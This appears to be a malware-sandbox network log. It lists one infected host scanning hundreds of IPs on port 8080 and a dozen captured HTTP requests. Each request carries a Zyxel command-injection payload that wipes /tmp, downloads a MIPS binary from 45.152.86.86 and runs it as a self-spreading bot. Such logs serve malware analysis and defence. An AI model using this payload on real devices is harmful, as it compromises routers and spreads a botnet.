      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 138.193.115.234:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 190.233.72.13:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 213.59.200.81:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 88.211.176.250:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 103.120.197.209:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 218.161.237.227:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 32.29.16.244:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 54.121.135.132:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 80.48.243.173:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 94.126.17.132:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 105.223.254.183:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 88.11.185.172:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 222.41.39.218:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 212.160.106.182:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 72.73.102.191:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 197.177.223.125:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 221.36.70.226:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 40.84.101.31:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 149.34.70.121:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 82.178.39.163:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 149.131.226.229:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 101.172.90.217:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 177.8.90.190:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 63.253.5.123:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 19.226.95.49:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 14.34.215.162:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 68.231.55.225:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 110.125.23.38:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 96.18.145.3:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 201.103.100.217:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 14.179.64.218:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 67.220.105.177:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 197.198.0.26:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 67.138.153.108:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 194.86.191.72:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 50.98.247.137:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 86.195.13.83:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 57.130.195.144:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 4.47.108.86:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 128.57.168.238:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 131.91.181.106:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 85.172.115.170:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 119.224.121.68:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 132.90.73.133:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 153.169.229.17:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 69.123.91.73:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 184.135.104.20:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 174.225.99.24:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 81.163.16.22:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 146.25.33.215:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 177.41.74.119:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 4.130.236.123:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 136.149.17.125:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 100.139.46.4:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 186.101.82.208:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 57.69.12.214:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 149.6.123.106:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 163.15.96.207:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 67.242.74.49:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 160.94.41.145:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 64.22.42.137:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 109.249.245.154:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 208.189.192.148:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 24.170.156.86:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 128.75.192.130:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 49.204.69.175:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 19.247.154.40:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 77.58.137.16:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 189.23.138.118:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 144.239.163.5:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 25.177.43.62:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 2.187.243.150:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 189.36.231.119:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 184.180.108.1:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 164.142.118.67:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 144.142.24.78:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 38.159.22.74:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 140.91.97.215:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 53.137.185.166:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 116.179.103.49:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 200.69.159.3:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 128.148.104.218:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 89.199.43.115:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 51.81.252.24:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 18.11.143.61:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 121.56.191.124:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 100.227.174.213:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 153.42.210.2:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 154.57.154.45:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 61.178.84.95:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 206.28.44.47:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 187.31.255.23:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 165.198.234.190:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 97.250.96.220:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 197.16.155.138:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 77.44.231.232:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 93.41.104.82:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 94.106.4.72:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 69.224.79.99:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 61.236.253.20:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 201.212.60.136:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 72.189.228.157:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 216.74.55.129:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 153.95.115.90:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 199.196.136.148:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 14.220.157.13:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 126.246.73.54:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 34.48.63.142:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 222.21.170.147:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 119.55.167.147:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 80.199.157.18:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 178.212.121.29:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 206.176.154.225:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 42.164.87.232:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 106.32.23.38:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 57.72.211.89:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 174.3.179.20:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 139.217.148.76:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 41.209.80.185:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 103.244.43.59:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 52.137.87.172:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 53.107.189.161:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 106.28.60.140:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 20.167.19.198:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 12.176.45.237:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 128.139.190.229:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 12.18.7.211:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 134.164.197.14:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 183.200.234.209:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 160.230.35.51:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 203.119.222.255:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 134.226.71.100:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 31.24.35.94:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 199.137.247.48:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 8.140.239.47:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 222.138.234.201:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 72.179.252.39:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 153.172.64.131:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 218.104.127.203:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 205.210.119.86:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 5.182.51.172:8080
      Source: global trafficTCP traffic: 192.168.2.23:44020 -> 45.152.86.86:56789
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 151.245.90.104:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 87.140.112.156:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 184.30.201.205:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 147.107.93.22:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 40.12.64.111:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 86.129.227.17:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 176.21.123.17:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 209.236.57.111:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 219.185.120.173:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 187.80.119.168:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 68.92.238.129:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 146.89.195.47:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 9.163.177.60:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 102.163.219.158:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 90.127.231.240:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 213.119.247.97:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 76.131.174.4:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 48.3.139.69:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 188.229.37.98:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 146.14.114.141:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 68.49.240.28:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 99.145.217.83:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 72.131.206.50:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 73.76.107.1:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 114.23.148.19:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 160.112.184.243:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 94.106.239.255:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 126.81.121.98:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 161.140.131.11:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 119.212.247.58:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 182.109.169.232:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 163.151.172.131:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 71.20.232.155:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 149.197.103.130:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 191.108.42.4:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 73.69.221.98:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 185.227.66.25:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 57.148.55.121:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 171.113.142.183:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 171.126.8.200:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 4.117.189.15:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 143.205.90.254:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 106.36.229.79:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 51.63.249.120:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 204.222.79.165:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 62.67.230.95:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 87.177.105.15:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 76.94.226.210:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 20.52.46.215:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 69.222.90.98:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 76.234.170.144:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 151.55.23.207:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 210.155.215.139:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 60.112.33.200:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 202.118.94.84:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 152.21.105.88:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 154.35.245.65:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 89.126.146.46:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 218.201.95.249:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 124.58.210.99:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 67.237.85.85:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 4.121.92.159:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 179.53.80.41:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 115.224.76.191:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 38.58.218.95:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 171.124.147.6:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 150.111.170.216:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 216.156.8.18:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 51.3.94.62:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 216.123.123.121:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 160.48.122.253:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 49.81.149.183:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 184.30.208.4:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 25.92.194.144:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 167.135.50.50:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 153.111.234.103:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 152.133.150.7:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 65.12.80.82:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 36.108.222.60:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 105.8.84.119:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 13.72.190.139:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 4.102.178.137:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 63.196.235.11:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 200.13.63.87:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 163.203.218.220:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 87.151.51.216:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 202.14.67.13:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 114.150.14.224:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 132.208.97.75:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 223.126.233.79:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 65.80.180.170:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 142.187.139.245:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 186.77.13.16:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 14.188.245.200:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 211.138.127.122:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 151.80.105.153:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 168.57.124.10:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 103.3.55.52:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 38.195.43.78:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 122.179.23.177:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 137.157.185.234:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 219.196.43.225:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 117.214.94.180:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 63.104.127.109:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 107.94.16.63:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 106.235.33.50:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 146.57.174.81:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 47.40.98.236:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 118.216.80.16:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 190.162.55.13:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 79.57.24.119:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 124.206.198.66:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 104.51.23.167:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 168.203.211.74:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 186.242.228.92:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 80.225.75.211:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 121.75.135.53:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 147.228.153.255:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 75.47.49.254:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 102.51.115.106:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 202.206.220.171:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 203.154.25.203:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 153.47.20.135:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 160.125.135.138:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 123.130.90.255:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 140.252.19.95:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 123.104.194.250:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 98.94.238.48:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 68.152.162.173:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 8.100.198.183:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 183.84.179.10:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 218.129.59.27:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 180.81.2.163:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 154.88.112.89:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 223.55.201.212:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 34.19.241.65:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 113.146.155.83:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 20.72.53.5:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 83.179.139.175:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 174.1.195.197:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 150.105.26.251:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 95.45.179.127:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 117.173.44.241:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 130.199.184.113:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 46.129.89.126:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 164.162.249.188:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 74.200.221.178:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 115.81.6.162:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 76.89.105.183:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 54.182.194.138:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 195.39.23.39:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 161.6.67.124:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 123.95.199.205:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 187.195.77.5:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 104.87.4.56:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 141.19.122.144:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 37.54.206.96:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 109.207.185.66:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 179.90.236.74:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 58.216.10.200:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 110.72.133.6:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 146.114.136.182:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 164.186.223.111:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 167.23.141.146:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 69.0.48.114:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 120.174.124.43:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 42.52.52.31:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 143.24.249.129:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 96.183.199.218:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 90.41.162.233:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 53.162.224.83:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 43.165.175.118:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 210.151.173.49:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 218.80.34.148:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 8.209.40.91:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 31.144.36.175:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 155.221.10.170:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 204.183.109.174:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 138.77.246.233:8080
      Source: global trafficTCP traffic: 192.168.2.23:40002 -> 158.250.4.227:8080
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
